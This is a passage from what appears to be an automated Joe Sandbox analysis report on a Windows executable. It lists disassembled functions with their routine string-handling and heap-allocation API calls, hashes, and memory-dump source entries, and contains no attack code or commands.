                          • Opcode ID: 8df619d559e22ff8ef6a586a2842ba75cbff4eb74fd1363aa70d635dbe072968
                          • Instruction ID: b7b069bfe92bee428e63d81bb7d6182c233b5935ebd2fade99d97c30df5ba469
                          • Opcode Fuzzy Hash: 8df619d559e22ff8ef6a586a2842ba75cbff4eb74fd1363aa70d635dbe072968
                          • Instruction Fuzzy Hash: F9F0C8B09016596BE7209BB49C49BF776A8AB14704F004591EB85E7281DAB89C828794
                          APIs
                          • __getptd.LIBCMT ref: 007F8FDD
                            • Part of subcall function 007F87FF: __amsg_exit.LIBCMT ref: 007F880F
                          • __getptd.LIBCMT ref: 007F8FF4
                          • __amsg_exit.LIBCMT ref: 007F9002
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 007F9026
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: c16e5e8e442c2b33ec5a268060a70a3b4a5410ff2dfc8dccaa6cf518c2e1dd0d
                          • Instruction ID: 66a20c82eede8fce704cfc9ff731d2ab95806dd89c0cec6adee9b06f294d50aa
                          • Opcode Fuzzy Hash: c16e5e8e442c2b33ec5a268060a70a3b4a5410ff2dfc8dccaa6cf518c2e1dd0d
                          • Instruction Fuzzy Hash: 8FF09632908618DBD7A5BB78980FB7D33A07F00720F244109F754A63D2DF6C5940DA6A
                          APIs
                          • lstrlen.KERNEL32(------,007D5BEB), ref: 007F731B
                          • lstrcpy.KERNEL32(00000000), ref: 007F733F
                          • lstrcat.KERNEL32(?,------), ref: 007F7349
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrcpylstrlen
                          • String ID: ------
                          • API String ID: 3050337572-882505780
                          • Opcode ID: 1984848b2bc6a3b07d128851477f1e3bfb2ab7a79d9aa1187483ff864bfd1946
                          • Instruction ID: a914dbc74743f3ce799a08f2fa1cf34ec050ac5cb789765c38db3a998694e663
                          • Opcode Fuzzy Hash: 1984848b2bc6a3b07d128851477f1e3bfb2ab7a79d9aa1187483ff864bfd1946
                          • Instruction Fuzzy Hash: 0BF039B45043069FDB289F75DC49927BAF8EF84700318882DA8DAC3315EB38E842CB10
                          APIs
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1557
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D1579
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D159B
                            • Part of subcall function 007D1530: lstrcpy.KERNEL32(00000000,?), ref: 007D15FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E3422
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E344B
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E3471
                          • lstrcpy.KERNEL32(00000000,?), ref: 007E3497
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: bf2f3502b8504abe53921c21401ca14613907b1e35732dd15ae027a1afe224e6
                          • Instruction ID: b828d51dfba09b59be15f88ab86ac3076eead6a84cb5cda0a5f44b0ecdfb0415
                          • Opcode Fuzzy Hash: bf2f3502b8504abe53921c21401ca14613907b1e35732dd15ae027a1afe224e6
                          • Instruction Fuzzy Hash: 2212EE70B022419FDB58CF2AC558B25B7E5AF48718B19C1AED409DB3A2D77AED42CF40
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 007E7C94
                          • std::_Xinvalid_argument.LIBCPMT ref: 007E7CAF
                            • Part of subcall function 007E7D40: std::_Xinvalid_argument.LIBCPMT ref: 007E7D58
                            • Part of subcall function 007E7D40: std::_Xinvalid_argument.LIBCPMT ref: 007E7D76
                            • Part of subcall function 007E7D40: std::_Xinvalid_argument.LIBCPMT ref: 007E7D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: string too long
                          • API String ID: 909987262-2556327735
                          • Opcode ID: a8f505b894f6bd0fe358b89e37fca368bcf1f002ccb00f9e3b3f742ddb5f46b0
                          • Instruction ID: b78b3900a9d6b41de2821a939db13c9d92fbed6e6d1d158a02c52b8a4f111243
                          • Opcode Fuzzy Hash: a8f505b894f6bd0fe358b89e37fca368bcf1f002ccb00f9e3b3f742ddb5f46b0
                          • Instruction Fuzzy Hash: 7431487230A2848BE728DD6DE88092AF3EDEF98760B30452AF141CB651E7759C40C3B4
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,?), ref: 007D6F74
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007D6F7B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID: @
                          • API String ID: 1357844191-2766056989
                          • Opcode ID: fd84f8900aa35a2227d2d276a708bc1118eba5fe760b3b5a1c76bb0a286be492
                          • Instruction ID: ac65134e0eb54cb1a3ec545385e37fc3946c5a680fd77cde51f8facb15a944ba
                          • Opcode Fuzzy Hash: fd84f8900aa35a2227d2d276a708bc1118eba5fe760b3b5a1c76bb0a286be492
                          • Instruction Fuzzy Hash: 8D218EB0600A019BEB20CB60DC84BBB73F8EB44704F44486EF986CBA85F7B9E945C751
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007F244C
                          • lstrlen.KERNEL32(00000000), ref: 007F24E9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F2570
                          • lstrlen.KERNEL32(00000000), ref: 007F2577
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 4b109bfe3643900cdd90e910bac71b94062f9f162ba11b58c6762d3443c4c75d
                          • Instruction ID: 997c916f870041ecefc73c9fc12d2b7bb1007558c95a742d0e06721e7bb64d46
                          • Opcode Fuzzy Hash: 4b109bfe3643900cdd90e910bac71b94062f9f162ba11b58c6762d3443c4c75d
                          • Instruction Fuzzy Hash: 8A81E4B1E0120D9BDB14CF94DC44BBEB7B5AF84300F1481A9E608A7382EB799D43CB95
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 007F15A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F15D9
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F1611
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F1649
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 280074923e9c489a2a3e9d8d22e0a0d288da2900fa93fc6911ca300493ec7b95
                          • Instruction ID: de77d0979f12a849ee236efcfac5d539798ff5edd75f4504b624442b567abfbc
                          • Opcode Fuzzy Hash: 280074923e9c489a2a3e9d8d22e0a0d288da2900fa93fc6911ca300493ec7b95
                          • Instruction Fuzzy Hash: 3B210874601B06CBD724DF6AD458A27B7F8AF94700F448A1DA896D7B41DB38F812CBA0
                          APIs
                            • Part of subcall function 007D1610: lstrcpy.KERNEL32(00000000), ref: 007D162D
                            • Part of subcall function 007D1610: lstrcpy.KERNEL32(00000000,?), ref: 007D164F
                            • Part of subcall function 007D1610: lstrcpy.KERNEL32(00000000,?), ref: 007D1671
                            • Part of subcall function 007D1610: lstrcpy.KERNEL32(00000000,?), ref: 007D1693
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1557
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1579
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D159B
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D15FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: bf25c404241d6fd3554c623029be68b7659eab61e8b317e109b2a4e6a5865aa3
                          • Instruction ID: f42bbc502a89190ddd6eebee8c0326fb147a8f512d056e2cd471a061971b3250
                          • Opcode Fuzzy Hash: bf25c404241d6fd3554c623029be68b7659eab61e8b317e109b2a4e6a5865aa3
                          • Instruction Fuzzy Hash: 3231D674A01B42EFD724DF3AD598952BBF5BF48300740492EA896C3B10EB38F812CB80
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 007D162D
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D164F
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1671
                          • lstrcpy.KERNEL32(00000000,?), ref: 007D1693
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: b608ca9d34bcd35c258a6297cabe57169d351aa350ed758639cefe8b60be9e6a
                          • Instruction ID: 99278d1ed6128022253a61c6182fe0924476e56c903d7041e0c351eccb31fc07
                          • Opcode Fuzzy Hash: b608ca9d34bcd35c258a6297cabe57169d351aa350ed758639cefe8b60be9e6a
                          • Instruction Fuzzy Hash: A111EC74A11B02ABDB249F75D45C927B7F8BF44701748462EA496C3B51EB38F802CB90